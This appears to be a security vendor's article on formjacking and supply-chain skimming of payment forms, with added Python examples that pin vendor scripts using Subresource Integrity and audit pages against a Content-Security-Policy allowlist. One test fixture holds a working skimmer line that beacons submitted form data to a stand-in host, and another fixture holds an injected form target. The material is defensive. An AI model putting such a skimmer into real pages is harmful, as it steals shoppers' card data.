This puts them at risk for client-side cyberattacks. Alarmingly, these attacks can be successful even with industry-standard server protection in place.
The organization itself does not process any of this data: it sends raw data to a third party and receives the processed result back. Attackers have begun targeting that exchange, which happens in the customer's browser rather than on the organization's servers.
Formjacking is among the most dangerous kinds of client-side attacks. If hackers compromise an e-commerce processor’s payment form, then every company using that particular payment service becomes a target. Whenever a customer enters their credit card data onto the payment form, that data is skimmed and sent to the attackers.
If you run an e-commerce website and integrate a payment provider solution, you will probably do the same thing most engineers and developers do: Simply copy and paste the code your vendor gives you.
It is hard for attackers to tamper with code sent between vendors and clients over secure channels. But not all code is sent that way. Open source repositories such as GitHub let anyone copy and paste code, and some vendors send their clients integration code through unsecured email.
In these situations, it’s relatively simple for a hacker to use tried-and-true phishing methods to gain access to the code being sent. If a hacker compromises a payment processor’s email account, or finds their way into a code repository that other developers will be copying and pasting from, their changes may easily go unnoticed.
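One way to notice that a vendor snippet has been altered between the vendor and the page is Subresource Integrity (SRI): the script tag carries a hash of the reviewed script body, and the browser refuses to run anything that does not match. The following is an added example, not Imperva's or any payment vendor's code; the script body, the URL and the injected skimmer line are constructed for illustration.

```python
"""Pin a vendor-supplied script with Subresource Integrity and detect a
tampered copy. Added example; all URLs and script bodies are constructed."""
import base64
import hashlib
import hmac
import re

# Constructed stand-in for the vendor's JavaScript as originally shipped.
VENDOR_URL = "https://js.example-payments.invalid/v1/widget.js"
VENDOR_SCRIPT = b"window.PayWidget={mount:function(f){/* renders card form */}};\n"

# The same body with a skimmer appended, the way a compromised CDN copy or
# a tampered pasted snippet would look. Constructed for the example.
TAMPERED_SCRIPT = VENDOR_SCRIPT + (
    b"document.addEventListener('submit',function(e){"
    b"navigator.sendBeacon('https://collect.example.invalid/s',"
    b"new FormData(e.target))});\n"
)


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the value for the integrity attribute: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(url: str, reviewed_body: bytes) -> str:
    """Build the tag to paste into the page, pinned to the body you reviewed."""
    return (f'<script src="{url}" integrity="{sri_hash(reviewed_body)}" '
            'crossorigin="anonymous"></script>')


def verify_sri(tag: str, served_body: bytes) -> bool:
    """Model the browser's check: does the served body match the pinned hash?

    A browser silently refuses to execute the script on mismatch; returning
    False here lets a deployment check fail loudly instead.
    """
    m = re.search(r'integrity="([a-z0-9]+)-([A-Za-z0-9+/=]+)"', tag)
    if not m:
        return False                       # no pin, so nothing is enforced
    algo, expected = m.group(1), m.group(2)
    if algo not in ("sha256", "sha384", "sha512"):
        return False                       # browsers ignore other algorithms
    actual = base64.b64encode(hashlib.new(algo, served_body).digest()).decode()
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    tag = script_tag(VENDOR_URL, VENDOR_SCRIPT)
    print(tag)
    print("genuine copy accepted:", verify_sri(tag, VENDOR_SCRIPT))
    print("skimmed copy accepted:", verify_sri(tag, TAMPERED_SCRIPT))
```

Two caveats apply. SRI pins one exact byte sequence, so it only works for vendor scripts that are versioned by URL and not rewritten in place; many payment widgets are not. And if the snippet itself, integrity value included, arrived through the compromised channel (email, a tampered repository), the pin proves nothing: confirm the hash against a second source such as the vendor's documentation over HTTPS before pasting it.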
Another common tactic cybercriminals use is scanning for misconfigured (publicly writable) Amazon S3 buckets and appending skimming code to the JavaScript files they find there. More than 17,000 domains have been compromised by the Magecart group using this strategy.
Since 2019, we’ve documented an active campaign to automate the process of scanning for these misconfigured buckets. Hackers do not need to manually look for vulnerabilities. Web administrators – even for very small sites – need to review their website code for suspicious artifacts and unauthorized changes.
It’s easy to see the efficiency of this approach. Cybercriminals only need to compromise a single account in order to gain access to thousands of websites. Automation essentially guarantees a financial return.
The first step to adequate protection is to inventory every third-party service a page talks to and approve each one explicitly. Imperva's Client-Side Protection solution continuously monitors these connections and only allows the execution of pre-approved services.
This way, site owners can block connections to unapproved destinations. Even compromised code cannot send sensitive data from the client to an unknown destination.
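The review of site code for unauthorized changes and the allowlisting of destinations described above can both be exercised with a small audit. The following is an added example, not Imperva's product or any vendor's code: it parses a constructed checkout page, reports every script origin and form target that is not on an approved list, and emits a standard Content-Security-Policy header that enforces the same list in the browser. The HTML, host names and allowlist are all constructed for illustration.

```python
"""Audit a page's script sources and form targets against an allowlist and
emit an enforcing Content-Security-Policy. Added example; constructed data."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed checkout page: an approved payment script, an inline call,
# a protocol-relative script from an approved host, and two injected
# elements pointing at hosts the site never approved.
CHECKOUT_HTML = """
<html><body>
<script src="https://js.example-payments.invalid/v1/widget.js"></script>
<script>PayWidget.mount('#card');</script>
<form id="card" action="/checkout"></form>
<script src="https://cdn-stats.example.invalid/analytics.min.js"></script>
<script src="//static.example.invalid/jquery.js"></script>
<form action="https://collect.example.invalid/s"></form>
</body></html>
"""

# Origins the site has reviewed and approved, per CSP directive (constructed).
ALLOWLIST = {
    "script-src": {"https://js.example-payments.invalid",
                   "https://static.example.invalid"},
    "form-action": {"'self'"},
}


class LoadPointCollector(HTMLParser):
    """Collect every external script source and form submission target."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.form_actions = []
        self.inline_scripts = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self.inline_scripts += 1
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])


def origin_of(url: str, page_scheme: str = "https") -> str:
    """Normalise a URL to scheme://host, the granularity CSP matches on."""
    if url.startswith("//"):                # protocol-relative URL
        url = f"{page_scheme}:{url}"
    parts = urlsplit(url)
    if not parts.netloc:                    # relative path: same origin
        return "'self'"
    return f"{parts.scheme}://{parts.netloc}"


def audit(html: str, allow: dict = ALLOWLIST) -> dict:
    """Return the unapproved origins found, keyed by CSP directive."""
    c = LoadPointCollector()
    c.feed(html)
    return {
        "script-src": sorted({origin_of(u) for u in c.scripts}
                             - allow["script-src"]),
        "form-action": sorted({origin_of(u) for u in c.form_actions}
                              - allow["form-action"]),
        "inline-scripts": c.inline_scripts,
    }


def csp_header(allow: dict = ALLOWLIST) -> str:
    """Build the enforcing header from the same allowlist.

    connect-src is pinned to the approved script origins as well, so even a
    script that slipped past review cannot fetch() or beacon card data out.
    default-src 'self' also covers img-src, closing the image-beacon route.
    """
    script = " ".join(sorted(allow["script-src"]))
    form = " ".join(sorted(allow["form-action"]))
    return (f"Content-Security-Policy: default-src 'self'; "
            f"script-src 'self' {script}; connect-src 'self' {script}; "
            f"form-action {form}")


if __name__ == "__main__":
    for directive, found in audit(CHECKOUT_HTML).items():
        print(f"{directive}: {found}")
    print(csp_header())
```

The inline script count matters because a policy without `'unsafe-inline'` blocks inline code; move it into a file on an approved origin or add a nonce or hash source before enforcing. Run the policy in `Content-Security-Policy-Report-Only` mode first, and re-run the audit on every deploy: the injected origins in this sample are exactly the kind of change the text says small-site administrators must look for.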
Imperva’s Cloud WAF and Client-Side Protection services are complementary. Once you have the Cloud WAF deployed, you can then capitalize on the security benefits that Client-Side Protection offers.
Copyright © 2019 Imperva. All rights reserved